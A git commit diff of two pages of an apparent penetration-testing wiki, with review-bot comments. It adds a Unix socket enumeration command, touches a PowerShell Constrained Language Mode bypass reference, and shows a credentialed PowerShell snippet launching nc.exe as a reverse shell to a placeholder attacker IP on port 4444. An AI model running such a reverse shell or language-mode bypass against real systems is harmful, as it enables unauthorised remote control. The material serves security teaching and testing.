GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2020-08-25 20:46:29 +00:00 committed by gitbook-bot
parent 177537e422
commit b4e619098f
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 7 additions and 2 deletions

@ -432,6 +432,12 @@ _Note that the system must be using that socket file configuration or the backdo
If you **identify any writable socket** \(_now where are talking about Unix Sockets, not about the config `.socket` files_\), then, **you can communicate** with that socket and maybe exploit a vulnerability.
### Enumerate Unix Sockets
```bash
netstat -a -p --unix
```
### HTTP sockets
Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:
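Review bot: `netstat -a -p --unix` only fills the PID/program column for sockets owned by the invoking user unless it is run as root, so on an unprivileged enumeration pass most rows will show no process; since the paragraph above is specifically about finding writable sockets, the new section should also show how to check the permissions of the socket files themselves, e.g. `find / -type s -writable 2>/dev/null`, or `ls -l` on the paths netstat prints. `netstat` is also deprecated on many current distributions in favour of `ss`, so `ss -xlp` is worth listing as the equivalent. Minor: the context line "now where are talking about Unix Sockets" should read "now we are talking about Unix Sockets".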

@ -97,7 +97,7 @@ $ExecutionContext.SessionState.LanguageMode
Powershell -version 2
```
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll_ and **change the project to .Net4.5**.
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**.
#### Direct bypass:
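Review bot: the only change in this hunk escapes the closing underscore of the italic path (`.dll_ and` becomes `.dll\_ and`), which leaves the italic span opened at `_C:\Windows\...` without a terminator, so the rest of the sentence ("and **change the project to .Net4.5**") will either render inside the italic run or show a literal underscore. Either keep the unescaped `_` that closes the italic, or drop the italic markers around the path and put it in backticks instead, which also removes the need to escape the underscores in `GAC_MSIL` and `v4.0_3.0.0.0__31bf3856ad364e35`.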
@ -226,7 +226,6 @@ Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{St
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
## Groups
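Review bot: in the `[System.Diagnostics.Process]::Start(...)` call the fifth argument of that five-parameter overload (`fileName, arguments, userName, password, domain`) is the account's domain, but the snippet binds it to `$computer = "<hostname>"`, which reads as a target machine. `Process.Start` never launches anything on a remote host; the string must be the domain of the account (or the local machine name for a local account), so the variable and placeholder should be renamed (e.g. `$domain = "<domain_or_computername>"`) to avoid readers taking this for remote execution. Separately, the hunk header records one removed line (`-226,7 +226,6`) but the rendered page does not show which line was dropped; worth confirming nothing inside the fenced block went missing.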